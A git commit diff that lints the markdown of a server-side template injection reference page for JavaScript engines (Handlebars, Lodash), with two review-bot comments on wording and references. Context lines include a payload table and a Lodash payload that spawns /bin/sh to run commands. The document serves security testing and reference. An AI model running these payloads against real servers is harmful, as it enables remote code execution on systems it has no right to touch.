Markdown Linting - SSI, SSRF, SSTI

Swissky
2025-03-26 17:49:42 +01:00
parent 6963d1a21c
commit bad860d79d
13 changed files with 207 additions and 278 deletions

@@ -2,19 +2,17 @@
> Server-Side Template Injection (SSTI) occurs when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In the context of JavaScript, SSTI vulnerabilities can arise when using server-side templating engines like Handlebars, EJS, or Pug, where user input is integrated into templates without adequate sanitization.
## Summary
- [Templating Libraries](#templating-libraries)
- [Handlebars](#handlebars)
- [Handlebars - Basic Injection](#handlebars---basic-injection)
- [Handlebars - Command Execution](#handlebars---command-execution)
- [Lodash](#Lodash)
- [Lodash](#lodash)
- [Lodash - Basic Injection](#lodash---basic-injection)
- [Lodash - Command Execution](#lodash---command-execution)
- [References](#references)
## Templating Libraries
| Template Name | Payload Format |
@@ -33,7 +31,6 @@
| VelocityJS | `#=set($X="")$X` |
| VueJS | `{{ }}` |
## Handlebars
[Official website](https://handlebarsjs.com/)
@@ -50,9 +47,9 @@
This payload only work in handlebars versions, fixed in [GHSA-q42p-pg8m-cqh6](https://github.com/advisories/GHSA-q42p-pg8m-cqh6):
* `>= 4.1.0`, `< 4.1.2`
* `>= 4.0.0`, `< 4.0.14`
* `< 3.0.7`
- `>= 4.1.0`, `< 4.1.2`
- `>= 4.0.0`, `< 4.0.14`
- `< 3.0.7`
```handlebars
{{#with "s" as |string|}}
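Review bot: The sentence introducing this version list, "This payload only work in handlebars versions, fixed in ...", is left as is while the bullets under it are restyled, and it still reads ambiguously: it is not clear whether the ranges are the versions where the payload works or the versions that carry the fix. Since the list is being touched anyway, consider rewording it to something like "This payload only works in the following Handlebars versions (fixed in GHSA-q42p-pg8m-cqh6):" so the ranges are clearly the affected ones.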
@@ -123,8 +120,7 @@ ${= _.VERSION}
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
```
## References
- [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
- [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
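Review bot: The References list keeps an "Exploiting Less.js to Achieve RCE" entry, but the Summary shown in the first hunk of this file only lists Templating Libraries, Handlebars and Lodash. If nothing in the file cites the Less.js article, this cleanup pass is a good place to either drop it or add the section it belongs to. The Handlebars reference line is also rewritten with no visible difference, so it is worth confirming the change is only trailing whitespace.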